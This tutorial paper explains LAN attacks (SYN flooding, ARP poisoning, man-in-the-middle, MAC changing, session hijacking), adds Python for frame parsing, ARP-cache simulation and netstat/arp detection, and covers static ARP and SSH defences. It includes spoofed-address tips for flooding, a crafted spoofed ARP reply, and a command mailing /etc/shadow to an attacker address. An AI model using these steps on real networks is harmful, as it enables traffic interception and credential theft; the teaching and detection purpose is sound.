Communication on a LAN takes place through protocols such as TCP/IP, UDP/IP, ARP and ICMP; the most widely used of these is TCP/IP.
TCP(Transmission Control Protocol)
Data sent on the network travels in packets, each carrying information about its source, its destination and the data itself. TCP is a protocol developed to make sure that data is not lost as routers forward packets from computer to computer: every byte sent has to be acknowledged by the receiver, and anything not acknowledged is retransmitted. TCP splits the application's data into pieces called segments; each segment is carried in an IP packet (a datagram), which on an Ethernet LAN is in turn wrapped in an Ethernet frame.
A typical frame on the wire looks like this (each header wraps the one after it):
ETHERNET HEADER --> Destination MAC, Source MAC
IP HEADER       --> Source IP, Destination IP (and TTL, protocol)
TCP HEADER      --> Source port, Destination port, sequence numbers, flags (SYN, ACK, PSH, RST)
DATA            --> the application's bytes
The address of the network card is called the MAC address. It is assigned by the manufacturer, stored on the card itself and meant to be globally unique. It is not truly unchangeable, though: most operating systems let the driver override it in software (see CHANGING MAC ADDRESS below).
TCP HEADER FLAGS (that we care about)
- SYN --> used in the initial connection setup
- ACK --> acknowledges received data; this is what makes TCP reliable
- PSH --> set when the segment carries data that should be pushed up to the application immediately
- RST --> aborts the connection; sent, for example, in reply to a SYN on a closed port. The other side must stop sending data.
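To make the frame layout and the flag bits concrete, here is an added example (my own code, not part of the original paper) that builds an Ethernet/IPv4/TCP frame from the fields above with Python's struct module and parses it back. The MAC and IP addresses in the sample are taken from the paper's test LAN; the checksums are left at zero, which is an assumption that holds for parsing but not for sending the frame to a real stack:

```python
import struct
from ipaddress import IPv4Address

# TCP flag bits as they sit in the low bits of the 13th/14th header bytes (RFC 793).
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def mac_bytes(s):
    """'00-0c-f1-6b-78-4f' or '00:0c:f1:6b:78:4f' -> 6 raw bytes."""
    parts = s.replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError("a MAC address has six octets")
    return bytes(int(p, 16) for p in parts)


def mac_str(b):
    return "-".join(f"{x:02x}" for x in b)


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, flags,
                seq=0, ack=0, payload=b"", ttl=128, window=64240):
    """Ethernet II + IPv4 + TCP, the three headers the paper lists, around PAYLOAD.
    IP and TCP checksums are left at zero (assumption): fine for parsing, not for sending."""
    flag_bits = 0
    for name in flags:
        flag_bits |= TCP_FLAGS[name]
    data_offset = 5  # 5 x 32-bit words = 20-byte TCP header, no options
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (data_offset << 12) | flag_bits, window, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 20 + len(tcp), 1, 0x4000, ttl, IPPROTO_TCP, 0,
                     IPv4Address(src_ip).packed, IPv4Address(dst_ip).packed)
    eth = struct.pack("!6s6sH", mac_bytes(dst_mac), mac_bytes(src_mac), ETHERTYPE_IPV4)
    return eth + ip + tcp


def parse_frame(frame):
    """Walk the headers back out: MACs from Ethernet, IPs/TTL from IP, ports/flags from TCP."""
    if len(frame) < 14 + 20 + 20:
        raise ValueError("frame too short for Ethernet+IPv4+TCP")
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError(f"not IPv4 (ethertype 0x{ethertype:04x})")
    ip = frame[14:]
    (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum,
     src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or total_len > len(ip):
        raise ValueError("malformed IPv4 header")
    if proto != IPPROTO_TCP:
        raise ValueError(f"not TCP (IP protocol {proto})")
    tcp = ip[ihl:total_len]
    (sport, dport, seq, ack, off_flags, _window,
     _tcsum, _urg) = struct.unpack("!HHIIHHHH", tcp[:20])
    data_offset = (off_flags >> 12) * 4  # read, not assumed: real segments carry options
    if data_offset < 20 or data_offset > len(tcp):
        raise ValueError("malformed TCP header")
    flag_bits = off_flags & 0x3F
    return {
        "dst_mac": mac_str(dst_mac), "src_mac": mac_str(src_mac),
        "src_ip": str(IPv4Address(src_ip)), "dst_ip": str(IPv4Address(dst_ip)),
        "ttl": ttl, "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": [n for n, bit in TCP_FLAGS.items() if flag_bits & bit],
        "payload": tcp[data_offset:],
    }


def handshake_step(flags):
    """Which leg of the three-way handshake a segment with these flags is (or None)."""
    s = set(flags)
    if s == {"SYN"}:
        return "1: client SYN"
    if s == {"SYN", "ACK"}:
        return "2: server SYN/ACK"
    if s == {"ACK"}:
        return "3: client ACK (or plain data ACK)"
    return None


if __name__ == "__main__":
    # Constructed sample: the SYN from the paper's tcpdump line, T1 -> T2 port 25.
    syn = build_frame("00-02-44-57-7c-45", "00-50-ba-8f-00-0a", "169.254.0.2", "169.254.0.3",
                      1163, 25, ["SYN"], seq=398263844)
    p = parse_frame(syn)
    print(p["src_ip"], p["sport"], "->", p["dst_ip"], p["dport"], p["flags"],
          handshake_step(p["flags"]))
```

The same parse_frame can be pointed at frames read from a capture; the one difference in real traffic is that the TCP header usually carries options (the tcpdump line later in the paper shows mss and sackOK), which is why the data offset is read from the header rather than assumed to be 20 bytes.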
HOW TCP CONNECTION IS ESTABLISHED
Sending a packet with the SYN flag set means its sender wants to open a TCP connection with the destination system by way of the three-way handshake. Let's look at this more closely -->
If you are A and the other one is B. You want a connection with B.
A----------------------SYN------------------------>B
B-------------------SYN/ACK-------------------->A
A---------------------ACK------------------------->B
Now the TCP connection is established.
SYN FLOODING
SYN flooding is an attack in which an attacker sends a large number of SYN packets to the target (victim) with a forged source IP address. The target answers each one with a SYN/ACK and reserves an entry in its table of half-open connections, waiting for an ACK that never arrives because the forged address does not exist on the network. The half-open table (the listen backlog) fills up, and the memory and time the target spends on these phantom connections are wasted.
Effects
As a result of SYN flooding, every service listening on the attacked ports of the target is affected. The target is busy sending SYN/ACK packets and waiting for replies, and with its backlog full it cannot accept connections from legitimate users or clients. Under an extremely heavy flood the host may become unresponsive or crash.
How the attack is done:
SYN flooding works against any host with a TCP listener; the target in this test was a Windows machine.
Here is the state of 169.254.0.18 after we flooded it from my computer (169.254.0.20) with the fake source address 169.254.0.21, aimed at ports 25 and 139. The fake address must be on your own network (here 169.254.x.x) and must not belong to a live host: if it did, that host would answer the target's SYN/ACK with a RST and the half-open entry would be released at once. Check that the address is unused by pinging it first.
C:\>netstat
Active Connections
  Proto  Local Address        Foreign Address      State
  TCP    169.254.0.18:25      169.254.0.21:21      SYN_RECEIVED
  TCP    169.254.0.18:139     169.254.0.21:139     SYN_RECEIVED
How to detect SYN Attack
When the attacker sends a SYN packet to the target, the target replies with SYN/ACK and waits for the ACK. Until that ACK arrives the connection is half-open and the target's side is in the state SYN_RECEIVED. A normal host has only a handful of connections in this state at any moment, each lasting a fraction of a second; a large and growing number of SYN_RECEIVED entries on one port, all from one or a few source addresses and never progressing to ESTABLISHED, is the sign that your system is under a SYN flood.
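As an added example (not from the paper), the following Python turns the SYN_RECEIVED check into something you can run over saved netstat output. The sample output is constructed: the first two connection lines repeat the paper's capture and the others are invented to push one port over the threshold; the threshold of five half-open connections per port is an assumption to be tuned for the host:

```python
import re
from collections import Counter

# Constructed sample of "netstat -an" on the flooded host 169.254.0.18. The first two
# connection lines copy the paper's capture; the rest are made up for the example.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    169.254.0.18:25        169.254.0.21:21        SYN_RECEIVED
  TCP    169.254.0.18:139       169.254.0.21:139       SYN_RECEIVED
  TCP    169.254.0.18:25        169.254.0.21:1025      SYN_RECEIVED
  TCP    169.254.0.18:25        169.254.0.21:1026      SYN_RECEIVED
  TCP    169.254.0.18:25        169.254.0.21:1027      SYN_RECEIVED
  TCP    169.254.0.18:25        169.254.0.21:1028      SYN_RECEIVED
  TCP    169.254.0.18:25        169.254.0.21:1029      SYN_RECEIVED
  TCP    169.254.0.18:139       169.254.0.20:1040      ESTABLISHED
  UDP    169.254.0.18:137       *:*
"""

# Windows prints SYN_RECEIVED; Linux "netstat -ant" prints SYN_RECV for the same state.
HALF_OPEN_STATES = {"SYN_RECEIVED", "SYN_RECV"}
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")


def parse_netstat(text):
    """Turn the TCP lines of netstat output into dicts; every other line is ignored."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            lip, lport, rip, rport, state = m.groups()
            conns.append({"lip": lip, "lport": int(lport), "rip": rip,
                          "rport": int(rport), "state": state})
    return conns


def half_open_by_port(conns):
    """{local port: Counter(remote ip -> number of half-open connections)}."""
    table = {}
    for c in conns:
        if c["state"] in HALF_OPEN_STATES:
            table.setdefault(c["lport"], Counter())[c["rip"]] += 1
    return table


def syn_flood_alerts(conns, threshold=5):
    """Ports with at least THRESHOLD half-open connections, with the sources behind them.
    The half-open vs. established ratio is reported too: under a flood the former
    grows while the latter stays flat, which is the signature the paper describes."""
    alerts = []
    for port, sources in sorted(half_open_by_port(conns).items()):
        total = sum(sources.values())
        if total >= threshold:
            established = sum(1 for c in conns
                              if c["lport"] == port and c["state"] == "ESTABLISHED")
            alerts.append({"port": port, "half_open": total, "established": established,
                           "sources": dict(sources.most_common())})
    return alerts


if __name__ == "__main__":
    for a in syn_flood_alerts(parse_netstat(SAMPLE_NETSTAT)):
        print(f"port {a['port']}: {a['half_open']} half-open vs "
              f"{a['established']} established, from {a['sources']}")
```

Feed it the output of netstat -an taken a few seconds apart: a real flood shows the half-open count holding or climbing between snapshots, whereas a burst of legitimate connections drains to ESTABLISHED almost immediately.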
arp -a: another way to detect a SYN attack
During the previous attack, the ARP cache of 169.254.0.18 was -->
Interface: 169.254.0.18 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.21          00-00-00-00-00-00     invalid
  169.254.74.30         00-0c-6e-f1-9e-a3     dynamic
The first entry is the tell-tale. To send its SYN/ACK the target had to resolve the forged source address 169.254.0.21; nobody answered, and an entry with an all-zero MAC address and type invalid was left behind. An invalid entry whose address is also the foreign address of a pile of SYN_RECEIVED connections means you are being flooded from a spoofed source. On its own it only shows that one resolution failed (a mistyped address in a ping leaves the same trace), so read it together with the netstat output.
SPOOFING
Spoofing is a technique for disguising yourself as somebody else, who may or may not exist on the network, depending on what the attack needs. It is the basis of most attacks on a LAN. There are many types of spoofing, like ->>
- IP Spoofing
- ARP Spoofing
- DNS Spoofing
In this paper we will be discussing only ARP spoofing.
ARP SPOOFING
Any computer connected to a switched network (LAN) has two addresses.
The MAC address is the network card's address and normally stays fixed. Ethernet uses it to move frames back and forth between cards, independent of whatever protocols are carried on top of it (IP, TCP, UDP and application protocols such as FTP). Ethernet builds frames of data, and each frame has an Ethernet header containing the MAC addresses of the source and the destination computer.
The IP address is the logical address of the computer on the network; it is set by configuration, not by the hardware.
HOW LAN WORKS
When an IP packet is to be sent it must be wrapped in an Ethernet frame, and to build the Ethernet header the sender needs the MAC address of the destination machine. At that moment the only thing it knows is the destination IP address in the packet's IP header. There must therefore be a way for the Ethernet layer to find the MAC address of a machine given its IP address.
This is where ARP (Address Resolution Protocol) comes into play.
Let us suppose A (169.254.0.1) wants to talk to C (169.254.0.3). A generates an "ARP request" and broadcasts it to every host on the network, asking "Is your IP address 169.254.0.3? If so, send your MAC address to me".
Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it and hands it to the networking software running on that system. Only C, whose IP address is 169.254.0.3, responds, with a unicast "ARP reply" carrying C's MAC address back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the higher-level protocol communication can proceed.
To reduce the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it updates its ARP cache with the new IP/MAC association. (The request itself carries A's IP and MAC as well, so C caches A's entry without having to send a request of its own.)
If you want to know the MAC address of a remote Windows host on the LAN, you can ask for its NetBIOS name table (this works only for hosts running NetBIOS over TCP/IP; for any host, pinging it and then running arp -a does the job):
C:\>nbtstat -A 169.254.24.60        (or by name: nbtstat -a CHETAN)
Local Area Connection:
Node IPAddress: [169.254.0.20] Scope Id: []
    NetBIOS Remote Machine Name Table
      Name            Type     Status
    ---------------------------------------------
    CHETAN         <00>  UNIQUE   Registered
    CHETAN         <20>  UNIQUE   Registered
    MSHOME         <00>  GROUP    Registered
    MSHOME         <1E>  GROUP    Registered
    CHETAN         <01>  UNIQUE   Registered
    CHETAN         <03>  UNIQUE   Registered
    C_VERMA        <03>  UNIQUE   Registered
    MAC Address = 00-0C-6E-94-0A-BF
HOW A SWITCH WORKS
A switch forwards frames, not packets: it looks only at the Ethernet header and knows nothing about the IP addresses inside. It maintains a table (the MAC address table) that maps each of its ports to the MAC addresses seen on that port.
The table is empty when the switch is powered on and is filled by learning: each time a frame arrives on a port, the frame's source MAC address is recorded against that port. A frame whose destination MAC is in the table is sent out of that one port only; a frame whose destination is unknown, or is the broadcast address, is sent out of every port.
This is the situation before any "ARP request/reply" or data transfer has taken place. Suppose H wants to connect to T1 (refer Fig 3): H broadcasts an ARP request over the LAN to all current hosts, asking "Is your IP X1? If so, send me back your MAC address". As the request passes through the switch, H's MAC address is recorded against the port H is plugged into. Now the table will look like
T1 responds with an "ARP reply", unicast to H, containing T1's own MAC address. It can address H directly because the request carried H's IP and MAC address, which T1 has already entered in its ARP cache. As the reply passes through the switch and down the cable, T1's MAC address is recorded against T1's port, and the switch's table is updated to.
To deliver that reply the switch compares the destination MAC address of the frame with its internal table mapping port numbers to MAC addresses, and sends the frame out of H's port only, not out of every port as it did with the broadcast request.
HERE IS THE BUG
Because ARP is a stateless protocol, most operating systems update their cache whenever a reply arrives, whether or not they ever sent a request for that address; a reply that nobody asked for is accepted as readily as one that was.
We can exploit this bug.
ARP POISONING
To view your cache, type arp -a at the command prompt in Windows (and in Linux as well).
C:\>arp -a
Interface: 169.254.0.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.3           00-50-ba-8e-ff-e8     dynamic
  169.254.32.218        00-0b-2b-0d-fb-69     dynamic
  169.254.105.118       00-50-fc-b0-f3-50     dynamic
- 169.254.0.1 --> your own IP address
- 0x1000003 --> Windows' index for the interface (on Linux, arp -a prints the interface name, e.g. eth0, instead)
- 169.254.0.3 --> the IP address of a remote host you have communicated with
- 00-50-ba-8e-ff-e8 --> the MAC address of that host
- dynamic --> the entry type: learned from an ARP reply and aged out after a while, as opposed to static
Let's look at the communication between my machine and 169.254.0.3. I have its IP and MAC in my ARP table, and it has mine in its table. A dynamic entry lives only for a limited time before it is aged out and resolved again (on this setup the refresh came about every 30 seconds). If a malicious user sends me a spoofed ARP reply that maps 169.254.0.3 to a MAC address that does not exist, my frames for 169.254.0.3 go nowhere and I cannot talk to it until the entry is refreshed: a denial of service lasting at least that long. If instead the spoofed reply maps 169.254.0.3 to the attacker's own MAC, my traffic goes to the attacker, who can read it, alter it or hijack my session. Either way, this is called ARP poisoning.
After the poisoning my ARP cache looks like this (note the type of the poisoned entry):
C:\>arp -a
Interface: 169.254.0.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.3           00-50-ba-4e-ff-e3     invalid
  169.254.32.218        00-0b-2b-0d-fb-69     dynamic
  169.254.105.118       00-50-fc-b0-f3-50     dynamic
ATTACKS
MAC SPOOFING
Learning the MAC address of another system without ever sending your real MAC address, and so without leaving your real MAC address in that system's ARP cache, is MAC spoofing.
AIM -->>>>> H wants to learn A's MAC address without revealing its own.
H broadcasts an "ARP request" for A's IP address with a fake MAC address Mf as the sender address, in both the Ethernet header and the ARP payload (if the Ethernet source were H's real MAC, the switch would learn that one instead). The switch now has an entry mapping Mf to H's port. A answers with an "ARP reply" containing its real MAC address, addressed to Mf. When this frame reaches the switch, Mf is found on H's port, so the frame is delivered to H. Because H's Ethernet card is in "promiscuous mode", in which it passes up frames destined for MAC addresses other than its own, H sees the reply and learns A's real MAC address, while A's ARP cache holds only the fake Mf.
In Linux, promiscuous mode can be enabled with-->
# ifconfig eth0 promisc
and disabled with-->
# ifconfig eth0 -promisc
(on current distributions, where ifconfig may be absent: ip link set eth0 promisc on / off).
MAN IN THE MIDDLE ATTACK
Here H inserts itself into the communication path between T1 and T2. H forwards frames between the two targets so that their communication is not interrupted and neither side notices.
H poisons the ARP caches of T1 and T2 in this way-->
-->H sends a spoofed "ARP reply" to T1 saying that T2's IP address is at H's MAC.
-->At the same time it sends a spoofed "ARP reply" to T2 saying that T1's IP address is at H's MAC.
-->All IP traffic between T1 and T2 now goes to H first instead of directly to the other host.
How the attack works
While T1 and T2 are communicating, T1's ARP cache holds T2's IP and MAC address and vice versa. H poisons both caches: it sends a spoofed "ARP reply" to T1 with T2's IP and H's MAC, and to T2 with T1's IP and H's MAC. In T1's cache the IP address of T2 is now associated with the MAC address of H. When T1 wants to send a packet to T2, it takes the destination IP from the packet's IP header, looks up the MAC address for it in its ARP cache, and builds a frame with T2's IP address inside but H's MAC address in the Ethernet header. The switch maps that destination MAC to H's port and delivers the frame to H. Exactly the same happens to T2. H forwards what comes from T1 on to T2 and what comes from T2 on to T1 (IP forwarding must be enabled on H; otherwise the frames stop there and the attack is just a denial of service), so the connection between T1 and T2 is not interrupted and nothing looks wrong to either side. Because dynamic entries age out, H keeps re-sending the spoofed replies every couple of seconds, as the capture in the example shows.
SOLUTION-->>
To avoid this attack T1 should have a static entry for T2's IP and MAC, and T2 a static entry for T1's IP and MAC, in their respective caches; a static entry is not overwritten by received ARP replies.
T1 makes a static entry for T2 in this way (X2 is T2's IP address, M2 its MAC address)-->
C:\>arp -s X2 M2
For the hosts in the example, T1 would run arp -s 169.254.0.3 00-50-ba-8f-00-0a. Static entries on Windows do not survive a reboot and have to be maintained by hand on every host, so this scales only to a few critical pairs (a server and its gateway, say); protecting a whole LAN is a job for the switch (dynamic ARP inspection on managed switches).
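The following added example (my code, not the paper's; the hosts and MAC addresses are those of the paper's example network) pulls together the ARP mechanics from HOW LAN WORKS, the stateless-cache bug, the man-in-the-middle poisoning step and the static-entry fix. It builds real ARP request and reply frames with Python's struct module and runs them through a small model of a host's ARP cache. The ArpCache class is a simplification written for this example; its stateless=False mode models a cache that accepts replies only for outstanding requests, which is an assumption about one possible hardening rather than how any particular OS behaves:

```python
import struct
from ipaddress import IPv4Address

ARP_REQUEST, ARP_REPLY = 1, 2
ETHERTYPE_ARP = 0x0806
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(s):
    return bytes(int(p, 16) for p in s.replace("-", ":").split(":"))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an RFC 826 ARP packet (hardware=Ethernet, protocol=IPv4).
    Requests go to the broadcast MAC; replies are unicast to the target MAC."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), IPv4Address(sender_ip).packed,
                      mac_bytes(target_mac), IPv4Address(target_ip).packed)
    return eth + arp


def parse_arp(frame):
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    _ht, _pt, _hl, _pl, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "sender_mac": mac_str(smac), "sender_ip": str(IPv4Address(sip)),
            "target_mac": mac_str(tmac), "target_ip": str(IPv4Address(tip)),
            "eth_src": mac_str(frame[6:12])}


class ArpCache:
    """A host's ARP cache (simplified model for this example). stateless=True is the
    behaviour the paper calls the bug: any reply updates the cache, whether or not a
    request for that IP is outstanding."""

    def __init__(self, stateless=True):
        self.stateless = stateless
        self.entries = {}     # ip -> (mac, "dynamic" | "static")
        self.pending = set()  # ips we have broadcast a request for and not yet heard back

    def request(self, my_mac, my_ip, ip):
        self.pending.add(ip)
        return build_arp(ARP_REQUEST, my_mac, my_ip, ZERO_MAC, ip)

    def add_static(self, ip, mac):
        """What 'arp -s ip mac' does: a fixed entry that replies cannot overwrite."""
        self.entries[ip] = (mac, "static")

    def receive(self, frame):
        """Process an incoming ARP reply; return True if the cache was changed."""
        a = parse_arp(frame)
        if a["op"] != ARP_REPLY:
            return False
        ip, mac = a["sender_ip"], a["sender_mac"]
        if self.entries.get(ip, (None, None))[1] == "static":
            return False
        if not self.stateless and ip not in self.pending:
            return False  # unsolicited reply: ignored by the hardened variant
        self.entries[ip] = (mac, "dynamic")
        self.pending.discard(ip)
        return True

    def lookup(self, ip):
        return self.entries[ip][0] if ip in self.entries else None


# The paper's hosts (from its table); H poisons T1's view of T2.
H_MAC, T1_MAC, T2_MAC = "00:0c:f1:6b:78:4f", "00:02:44:57:7c:45", "00:50:ba:8f:00:0a"
H_IP, T1_IP, T2_IP = "169.254.0.1", "169.254.0.2", "169.254.0.3"


def poison_t1(stateless=True, static=False):
    """Returns (T1's MAC for T2 before the spoof, after the spoof, whether the spoof took)."""
    t1 = ArpCache(stateless)
    if static:
        t1.add_static(T2_IP, T2_MAC)
    t1.request(T1_MAC, T1_IP, T2_IP)                                 # legitimate resolution...
    t1.receive(build_arp(ARP_REPLY, T2_MAC, T2_IP, T1_MAC, T1_IP))   # ...answered by T2
    before = t1.lookup(T2_IP)
    spoof = build_arp(ARP_REPLY, H_MAC, T2_IP, T1_MAC, T1_IP)        # "169.254.0.3 is-at H"
    took = t1.receive(spoof)
    return before, t1.lookup(T2_IP), took


if __name__ == "__main__":
    print("stateless cache :", poison_t1())
    print("request-matched :", poison_t1(stateless=False))
    print("static entry    :", poison_t1(static=True))
```

The spoofed reply is accepted by the stateless cache and rejected by both hardened variants. Note the limits of each fix: a request-matching cache can still be poisoned by an attacker who races the genuine reply while a request is pending, which is why the static entry, which ignores replies altogether, is the stronger of the two for the pair of hosts it covers.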
Example: a successful attack on the LAN
Comp. | Name     | IP Address  | OS                                      | MAC
H     | Hacker   | 169.254.0.1 | Fedora Core (kernel 2.4.22-1.2115.nptl) | 00:0c:f1:6b:78:4f
T1    | Target 1 | 169.254.0.2 | Windows 2000 (Version 5.00.2195)        | 00:02:44:57:7c:45
T2    | Target 2 | 169.254.0.3 | Windows XP (Version 5.1.2600)           | 00:50:ba:8f:00:0a
H sends spoofed "ARP reply" frames to T1 and T2. The ARP caches of T1 and T2 after being poisoned:
T1:
Interface: 169.254.0.2 --- 0x2
  Internet Address      Physical Address      Type
  169.254.0.3           00-0c-f1-6b-78-4f     dynamic
· In the cache of T1, the IP address of T2 now corresponds to H's MAC address.
T2:
Interface: 169.254.0.3 on Interface 0x2
  Internet Address      Physical Address      Type
  169.254.0.2           00-0c-f1-6b-78-4f     dynamic
· Likewise, in the cache of T2, the IP address of T1 corresponds to H's MAC address.
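Both the invalid zero-MAC entry from the SYN flood section and the poisoned caches just shown can be picked out mechanically. This added example (my code, not the paper's) parses Windows arp -a output and applies three checks. The sample cache is constructed: the 169.254.0.3 line is the paper's, the entry for H's own address and the two others are made up; the EXPECTED table of known-good MAC addresses is an assumption the operator has to maintain:

```python
import re
from collections import defaultdict

# Constructed sample of "arp -a" on T1 (169.254.0.2) after H's poisoning. The 169.254.0.3
# line copies the paper's capture; the entry for H's own IP and the two others are made up
# (the invalid one mirrors the zero-MAC entry from the SYN-flood section).
SAMPLE_ARP_A = """\
Interface: 169.254.0.2 --- 0x2
  Internet Address      Physical Address      Type
  169.254.0.1           00-0c-f1-6b-78-4f     dynamic
  169.254.0.3           00-0c-f1-6b-78-4f     dynamic
  169.254.0.21          00-00-00-00-00-00     invalid
  169.254.74.30         00-0c-6e-f1-9e-a3     dynamic
"""

# What T1 should see for the hosts it cares about (T2's MAC from the paper's table).
# Assumption: the operator keeps such a list for gateways, servers and static-entry peers.
EXPECTED = {"169.254.0.3": "00-50-ba-8f-00-0a"}

ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)")


def parse_arp_table(text):
    """Windows 'arp -a' lines -> list of (ip, mac, type); MACs normalised to lower case."""
    return [(ip, mac.lower(), kind) for ip, mac, kind in
            (m.groups() for m in map(ENTRY_RE.match, text.splitlines()) if m)]


def audit_arp_table(entries, expected=EXPECTED):
    """Three checks, one dict per finding:
    - invalid:       unresolved entry (zero MAC / type invalid), the SYN-flood side effect
    - changed_mac:   a known host resolving to a MAC other than the one on record
    - duplicate_mac: one MAC claiming several IPs, the classic man-in-the-middle footprint"""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac, kind in entries:
        if kind == "invalid" or mac == "00-00-00-00-00-00":
            findings.append({"check": "invalid", "ip": ip, "mac": mac})
            continue
        by_mac[mac].append(ip)
        if ip in expected and expected[ip].lower() != mac:
            findings.append({"check": "changed_mac", "ip": ip, "mac": mac,
                             "expected": expected[ip].lower()})
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append({"check": "duplicate_mac", "mac": mac, "ips": sorted(ips)})
    return findings


if __name__ == "__main__":
    for finding in audit_arp_table(parse_arp_table(SAMPLE_ARP_A)):
        print(finding)
```

A duplicate MAC is not always an attack: a router answering for several addresses, or proxy ARP, produces the same picture, so treat that check as a prompt to compare against the expected table rather than as proof. The script looks at a single snapshot; running it periodically and diffing the findings is what catches a poisoning that starts later.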
Packets seen by tcpdump on the hacker's system, i.e. the spoofed replies H is sending; each target is re-poisoned every two seconds so the entries never age out:
23:42:02.474661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:04.084663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:04.484652 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:06.094662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:06.494660 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:08.104664 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:08.504663 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:10.114661 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
· When 169.254.0.2 (T1) tried to connect to 169.254.0.3 (T2) on port 25, its SYN passed through 169.254.0.1 (H), as shown below, which proves that 169.254.0.1 is now between T1 and T2.
23:42:46.294660 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:46.694653 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:46.705306 169.254.0.2.1163>169.254.0.3.smtp: S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
· Also, when 169.254.0.3 pinged 169.254.0.2, the ICMP echo requests again passed through 169.254.0.1, as shown below.
23:43:27.254104 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:28.504663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:28.904661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:30.266360 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:30.514657 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:30.914662 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:32.524663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:32.924654 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:33.270757 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:34.534662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:34.935399 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
CHANGING MAC ADDRESS
Although the MAC address is burned into the card, the address the card actually uses is set by the driver, and Linux users can change it without any spoofing software, with a single ifconfig parameter (the interface is normally taken down first). This can be used in an attack-->
# ifconfig eth0 hw ether 00:50:ba:8f:00:0a
The address must be given as six octets; the one above is T2's MAC from the table in the example. On current distributions the equivalent is ip link set eth0 address 00:50:ba:8f:00:0a.
In Windows 2000/XP you can do the same with tools such as SMAC.
This can be exploited as follows: H knocks T2 off the network with a DoS attack (refer Fig. 3), then assigns itself T2's IP and MAC address. The switch now learns T2's MAC address on H's port, so H receives every frame T1 sends to T2, without any ARP poisoning at all.
TCP/IP HIJACKING
Suppose A has logged in to server B as root over TELNET or FTP. A hacker H who can sniff the traffic poisons the ARP caches, takes over A's IP and MAC address and, with the session's sequence numbers known from the sniffed packets, can issue commands to B in A's place. One command such as "mail hacker_1@greathackers.com </etc/shadow" is enough. The hacker must first DoS A, with SYN flooding or ARP poisoning, so that A cannot interfere with the attack by storming ARP requests that would correct the caches.
SOLUTION -->>
Instead of a TELNET or FTP login, A can use SSH (Secure Shell) or SFTP. The session is then encrypted and integrity-checked, so a hacker in the middle can neither read the password nor inject commands; the most he can do is break the connection. This holds only if A verifies B's host key when connecting: an attacker who is already in the middle at that moment can otherwise present his own key and read everything.